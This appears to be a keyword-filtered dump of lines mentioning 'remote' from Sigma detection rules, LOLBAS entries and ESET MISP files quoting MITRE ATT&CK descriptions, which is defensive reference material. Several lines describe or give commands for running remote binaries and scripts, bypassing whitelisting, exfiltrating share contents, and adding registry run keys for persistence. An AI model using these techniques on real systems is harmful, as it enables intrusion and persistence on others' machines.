sigma	proc_creation_win_screenconnect.yml	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.	DRL 1.0
sigma	proc_creation_win_screenconnect.yml	Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)	DRL 1.0
sigma	proc_creation_win_susp_add_user_remote_desktop.yml	title: Suspicious Add User to Remote Desktop Users Group	DRL 1.0
sigma	proc_creation_win_susp_add_user_remote_desktop.yml	description: Detects suspicious command line in which a user gets added to the local Remote Desktop Users group	DRL 1.0
sigma	proc_creation_win_susp_add_user_remote_desktop.yml	- 'Remote Desktop Users'	DRL 1.0
sigma	proc_creation_win_susp_adidnsdump.yml	- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump	DRL 1.0
sigma	proc_creation_win_susp_cipher.yml	Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives	DRL 1.0
sigma	proc_creation_win_susp_msoffice.yml	description: Downloads payload from remote server	DRL 1.0
sigma	proc_creation_win_susp_netsh_command.yml	description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems	DRL 1.0
sigma	proc_creation_win_susp_network_command.yml	description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems	DRL 1.0
sigma	proc_creation_win_susp_network_listing_connections.yml	description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.	DRL 1.0
sigma	proc_creation_win_susp_nmap.yml	description: Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation	DRL 1.0
sigma	proc_creation_win_susp_plink_remote_forward.yml	title: Suspicious Plink Remote Forwarding	DRL 1.0
sigma	proc_creation_win_susp_plink_remote_forward.yml	description: Detects suspicious Plink tunnel remote forarding to a local port	DRL 1.0
sigma	proc_creation_win_susp_plink_remote_forward.yml	- https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d	DRL 1.0
sigma	proc_creation_win_susp_plink_remote_forward.yml	- Administrative activity using a remote port forwarding to a local port	DRL 1.0
sigma	proc_creation_win_susp_print.yml	description: Attackers can use print.exe for remote file copy	DRL 1.0
sigma	proc_creation_win_susp_rclone_execution.yml	- 'remote'	DRL 1.0
sigma	proc_creation_win_susp_regsvr32_http_pattern.yml	description: Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN	DRL 1.0
sigma	proc_creation_win_susp_screenconnect_access.yml	title: ScreenConnect Remote Access	DRL 1.0
sigma	proc_creation_win_susp_screenconnect_access.yml	description: Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)	DRL 1.0
sigma	proc_creation_win_susp_servu_process_pattern.yml	- Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution	DRL 1.0
sigma	proc_creation_win_susp_sharpview.yml	description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems	DRL 1.0
sigma	proc_creation_win_susp_winrm_execution.yml	title: Remote Code Execute via Winrm.vbs	DRL 1.0
sigma	proc_creation_win_susp_winrm_execution.yml	description: Detects an attempt to execute code or create service on remote host via winrm.vbs.	DRL 1.0
sigma	proc_creation_win_vul_java_remote_debugging.yml	title: Java Running with Remote Debugging	DRL 1.0
sigma	proc_creation_win_vul_java_remote_debugging.yml	description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect	DRL 1.0
sigma	proc_creation_win_webshell_detection.yml	- 'dir \' # remote dir: dir \<redacted IP #3>\C$:\windows\temp\*.exe	DRL 1.0
sigma	proc_creation_win_wmic_remote_service.yml	title: WMI Reconnaissance List Remote Services	DRL 1.0
sigma	proc_creation_win_wmic_remote_service.yml	An adversary might use WMI to check if a certain Remote Service is running on a remote device.	DRL 1.0
sigma	proc_creation_win_wmic_remote_service.yml	A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable	DRL 1.0
sigma	registry_event_change_rdp_port.yml	Remote desktop is a common feature in operating systems.	DRL 1.0
sigma	registry_event_change_rdp_port.yml	It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.	DRL 1.0
sigma	registry_event_change_rdp_port.yml	Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).	DRL 1.0
sigma	registry_event_disable_administrative_share.yml	description: Administrative shares are hidden network shares created by Microsoft’s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system	DRL 1.0
sigma	registry_event_hybridconnectionmgr_svc_installation.yml	description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.	DRL 1.0
sigma	registry_event_mstsc_history_cleared.yml	- https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer	DRL 1.0
sigma	registry_event_rdp_registry_modification.yml	description: Detects potential malicious modification of the property value of fDenyTSConnections and UserAuthentication to enable remote desktop connections.	DRL 1.0
sigma	win_dumping_ntdsdit_via_dcsync.yml	description: ntds.dit retrieving using synchronisation with legitimate domain controller using Directory Replication Service Remote Protocol	DRL 1.0
sigma	win_dumping_ntdsdit_via_netsync.yml	description: ntds.dit retrieving (only computer accounts) using synchronisation with legit domain controller using Netlogon Remote Protocol	DRL 1.0
sigma	win_remote_schtask.yml	title: Remote Schtasks Creation	DRL 1.0
sigma	win_remote_schtask.yml	description: Detects remote execution via scheduled task creation or update on the destination host	DRL 1.0
sigma	win_remote_schtask.yml	# By having this you can group logon events to their remote schtask creation event (as it is searching for a logon followed by a schtask creation) even by using a search timeframe over a long period of time e.g. 30days without running the risk of incorrectly grouping a logonID at one time, to a task creation at another.	DRL 1.0
sigma	win_remote_service.yml	title: Remote Service Creation	DRL 1.0
sigma	win_remote_service.yml	description: Detects remote execution via service creation on the destination host	DRL 1.0
sigma	win_remote_service.yml	# By having this you can group logon events to their remote service creation event (as it is searching for a logon followed by a service creation) even by using a search timeframe over a long period of time e.g. 30days without running the risk of incorrectly grouping a logonID at one time, to a task creation at another.	DRL 1.0
sigma	hawk.yml	windows-create-remote-thread:	DRL 1.0
sigma	qualys.yml	- network.remote.address.ip	DRL 1.0
LOLBAS	Netsh.yml	Description: Capture network traffic on remote file share.
LOLBAS	Netsh.yml	Description: Forward traffic from the listening address and proxy to a remote system.
LOLBAS	Cmstp.yml	Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
LOLBAS	Diantz.yml	Description: Download and compress a remote file and store it in a cab file on local machine.
LOLBAS	Diantz.yml	- IOC: diantz getting a file from a remote machine or the internet.
LOLBAS	Esentutl.yml	Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
LOLBAS	Finger.yml	Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
LOLBAS	Finger.yml	Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
LOLBAS	GfxDownloadWrapper.yml	Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
LOLBAS	Ieexec.yml	Description: Downloads and executes bypass.exe from the remote server.
LOLBAS	Ieexec.yml	Usecase: Download and run attacker code from remote location
LOLBAS	MpCmdRun.yml	- IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected.
LOLBAS	Msiexec.yml	Description: Installs the target remote & renamed .MSI file silently.
LOLBAS	Msiexec.yml	Usecase: Execute custom made msi file with attack code from remote server
LOLBAS	Pcalua.yml	Usecase: Proxy execution of remote dll file
LOLBAS	Print.yml	Usecase: Copy/Download file from remote server
LOLBAS	PrintBrm.yml	Description: Create a ZIP file from a folder in a remote drive
LOLBAS	PrintBrm.yml	Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
LOLBAS	Rasautou.yml	Description: Windows Remote Access Dialer
LOLBAS	Regsvr32.yml	Description: Execute the specified remote .SCT script with scrobj.dll.
LOLBAS	Regsvr32.yml	Usecase: Execute code from remote scriptlet, bypass Application whitelisting
LOLBAS	Replace.yml	- IOC: Replace.exe retrieving files from remote server
LOLBAS	Rundll32.yml	Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
LOLBAS	Rundll32.yml	Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
LOLBAS	Schtasks.yml	Description: Create a scheduled task on a remote computer for persistence/lateral movement
LOLBAS	Schtasks.yml	Usecase: Create a remote task to run daily relative to the the time of creation
LOLBAS	Scriptrunner.yml	Description: Executes calc.cmd from remote server
LOLBAS	Wmic.yml	Description: Execute evil.exe on the remote system.
LOLBAS	Wmic.yml	Usecase: Execute binary on a remote system
LOLBAS	Wmic.yml	Usecase: Execute binary with scheduled task created with wmic on a remote computer
LOLBAS	Wmic.yml	Usecase: Execute binary on remote system
LOLBAS	Wmic.yml	Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
LOLBAS	Wmic.yml	Usecase: Execute script from remote system
LOLBAS	Wmic.yml	- IOC: Wmic retrieving scripts from remote system/Internet location
LOLBAS	Advpack.yml	Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
LOLBAS	Advpack.yml	Usecase: Run local or remote script(let) code through INF file specification.
LOLBAS	Advpack.yml	Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
LOLBAS	Ieadvpack.yml	Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
LOLBAS	Ieadvpack.yml	Usecase: Run local or remote script(let) code through INF file specification.
LOLBAS	Ieadvpack.yml	Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
LOLBAS	Setupapi.yml	Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
LOLBAS	Setupapi.yml	UseCase: Run local or remote script(let) code through INF file specification.
LOLBAS	Syssetup.yml	Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
LOLBAS	Syssetup.yml	Usecase: Run local or remote script(let) code through INF file specification (Note May pop an error window).
LOLBAS	Winrm.yml	Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol
LOLBAS	Winrm.yml	Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol
LOLBAS	Bginfo.yml	Usecase: Remote execution of VBScript
LOLBAS	Excel.yml	Description: Downloads payload from remote server
LOLBAS	Excel.yml	Usecase: It will download a remote payload and place it in the cache folder
LOLBAS	Msxsl.yml	Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
LOLBAS	Msxsl.yml	Usecase: Local execution of remote script stored in XSL script stored as an XML file.
LOLBAS	Powerpnt.yml	Description: Downloads payload from remote server
LOLBAS	Powerpnt.yml	Usecase: It will download a remote payload and place it in the cache folder
LOLBAS	Remote.yml	Name: Remote.exe
LOLBAS	Remote.yml	- Command: Remote.exe /s "powershell.exe" anythinghere
LOLBAS	Remote.yml	Description: Spawns powershell as a child process of remote.exe
LOLBAS	Remote.yml	- Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
LOLBAS	Remote.yml	Description: Run a remote file
LOLBAS	Remote.yml	Usecase: Executing a remote binary without saving file to disk
LOLBAS	Remote.yml	- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
LOLBAS	Remote.yml	- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
LOLBAS	Remote.yml	- IOC: remote.exe process spawns
LOLBAS	Remote.yml	- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
LOLBAS	Winword.yml	Description: Downloads payload from remote server
LOLBAS	Winword.yml	Usecase: It will download a remote payload and place it in the cache folder
malware-ioc	misp-badiis.json	"remote-service-effects"	© ESET 2014-2018
malware-ioc	misp-badiis.json	"https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nThe DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"value": "Remote File Copy - T1105",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"tag_name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Remote File Copy - T1105\"",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"description": "Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\n\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.\n\nDetection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nPlatforms: Linux, macOS, Windows\n\nData Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring\n\nPermissions Required: User\n\nRequires Network: Yes",	© ESET 2014-2018
malware-ioc	misp-badiis.json	"name": "misp-galaxy:mitre-enterprise-attack-attack-pattern=\"Remote File Copy - T1105\"",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"remote-service-effects"	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access. \n\nAccounts that an adversary may use can fall into three categories: default, local, and domain accounts. Default accounts are those that are built-into an OS such as Guest or Administrator account on Windows systems or default factory/provider set accounts on other types of systems, software, or devices. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. (Citation: Microsoft Local Accounts Feb 2019) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.\n\nCompromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nDefault accounts are also not limited to Guest and Administrator on client machines, they also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or COTS. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed private keys, or stolen private keys, to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021) (Citation: Metasploit SSH Module)\n\nThe overlap of account access, credentials, and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft)",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, [Scripting](https://attack.mitre.org/techniques/T1064), [PowerShell](https://attack.mitre.org/techniques/T1086), or by using utilities present on the system.\n\nOne such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia)\n\nAnother example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016)\n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as Javascript.",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) for RPC communication.",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nThe <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.\n\nAdversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\n### Windows\n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder)\n\n[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>.\n\nAdversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.\n\n### Mac\n\nOn Mac, locally mounted shares can be viewed with the <code>df -aH</code> command.",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n\nFor connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. \n\n### Windows\n\nUtilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), \"net use,\" and \"net session\" with [Net](https://attack.mitre.org/software/S0039).\n\n### Mac and Linux \n\nIn Mac and Linux, <code>netstat</code> and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to \"net session\".",	© ESET 2014-2018
malware-ioc	misp-dukes-operation-ghost-event.json	"description": "Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include <code>C$</code>, <code>ADMIN$</code>, and <code>IPC$</code>. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)\n\nThe [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using <code>net use</code> commands with valid credentials. (Citation: Technet Net Use)",	© ESET 2014-2018
